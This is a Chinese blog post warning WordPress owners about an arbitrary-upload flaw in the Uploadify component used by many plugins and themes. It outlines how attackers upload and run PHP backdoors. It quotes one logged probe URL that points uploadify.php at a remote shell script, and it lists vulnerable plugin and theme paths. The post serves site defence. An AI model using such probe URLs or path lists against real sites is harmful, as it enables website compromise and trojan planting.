wordpress CMS主题 微信
Home > 网站建设 > WordPress Uploadify 外挂漏洞

WordPress Uploadify 外挂漏洞

高时银博客 网站建设 点击: 2,184 次 0 0
  • 标签:
  • 有被骇的人应该就知道漏洞没堵住,过没多久一样的症状又跑出来了,这就好像人会生病一样:没有找出真正致病的原因,是不可能根治的!

    Uploadify外挂

    Uploadify这个外挂是利用jQuery来上传档案的外挂,有许多的外挂都会用到它,这就跟之前高登提过出问题的TimThumb外挂一样,不只是单一的外挂会用到,而是有许多外挂都有用到这个模组

    而这种很多人用的模组出现漏洞时就是骇客大展身手的时机,因为只要写一个程式经由以下的流程就可以骇你的网站:

    • 以特定的网址测试你的网站是不是有这个外挂模组
    • 有的话利用这个外挂上传一个后门PHP程式到你的网站
    • 再由远端执行这个后门程式就可以将木马程式植入他想植入的档案
    • 最后就是你网站的访客被转走或是也被本植入木马变成殭尸网路的成员

    警告早已发出

    而事实上早在今年的4月份就有关于Uploadify这个模组的安全警示被公布:

    • Reflected XSS in Uploadify Integration WordPress plugin

    你没注意到?没关係!骇客会让你注意到,而且保证让你印象深刻!

    但是我们现在到WordPress官网用Uploadify Integration这个名称搜索却找不到这个外挂?!

    WordPress Uploadify 外挂漏洞

    研判应该是被WordPress官方移除了,但是跟TimThumb模组一样,还是有许多外挂及版型会用到这个模组,而漏洞就是这样产生的,像是有人在我网站用这样一串网址在试:

    • /wp-content/themes/zcool-like/uploadify.php?src=http://blogger.com.antarticachilena.cl/sh.php

    这样可以看出zcool-like这个版型也有用这个外挂

    含有Uploadify.php的外挂

    以下是网友热心整理出来的清单

    • /plugins/1-flash-gallery/
    • /plugins/annonces/ (Version 1.2.0.1 and older)
    • /plugins/apptivo-business-site/
    • /plugins/bulletproof-security/ (versions prior to 2/11/2011)
    • /plugins/chillybin-competition/
    • /plugins/comments_plugin/
    • /plugins/doptg/
    • /plugins/foxypress/ (Version 0.4.2.1 and older)
    • /plugins/gpress/
    • /plugins/html5avmanager/
    • /plugins/image-symlinks/
    • /plugins/kish-multi/
    • /plugins/lbg-vp2-html5-bottom/
    • /plugins/motorcycle-inventory/
    • /plugins/nmedia-user-file-uploader/
    • /plugins/pods/
    • /plugins/qr-color-code-generator-basic/
    • /plugins/squace-mobile-publishing-plugin-for-wordpress/
    • /plugins/wordpress-member-private-conversation/
    • /plugins/wp-crm/
    • /plugins/wp-property/
    • /plugins/wp-symposium/
    • /plugins/wpmarketplace/
    • /plugins/uploader/
    • /plugins/uploadify/ (Version 3.0 and older)
    • /plugins/very-simple-post-images/

    含有Uploadify.php的版型

    • /themes/aim-theme/ (Aim)
    • /themes/deep-blue/ (Deep Blue, Version 1.9.2 and older)
    • /themes/famous/ (Famous, Version 2.0.5 and older)
    • /themes/fresh_trailers/ (Fresh Trailer)
    • /themes/fresh_trailers_v2/ (Fresh Trailer V 2.0)
    • /themes/pronto/ (Pronto)
    • /themes/u-design (U-Design, Versions prior to 1.6.1)
    • /themes/wp-eden/ (WP Eden)
    • /themes/wpnavigator/ (The Navigator)
    • /themes/zcool-like/

    参考来源:IT Pixie: WordPress Exploit Alert: Uploadify.php

    请有用WordPress架站的一定要仔细看清楚,如果有新发现的外挂或版型也欢迎回报

    在我发出上一篇TimThumb的警告之后,我的网站就招来了一堆网路上搜寻相关版型外挂名称而来的小人(SEO作太好的下场,笑!)

    本来想说自身的安全比较重要不想再当好人了,但是发觉好像已经被列入参考名单之中,所以想要低调已经是不可能。不过几个月来认真的研究他们的手法,所以已经能够有效阻挡恶意访客,就把它当成在打怪练功吧!

    补充

    才发完文又看到两个外挂有类似的漏洞

    • WordPress Cimy User Extra Fields Plugin Arbitrary File Upload Vulnerability
    • WordPress Nmedia Users File Uploader Plugin Arbitrary File Upload Vulnerability

    请慎选外挂才能避免这一类的危险


    文章作者:高时银博客
    本文地址:http://wanlimm.com/77201505123733.html
    版权所有 © 转载时必须以链接形式注明作者和原始出处!

    目前还没有评论。赶快来坐沙发吧。

    发表评论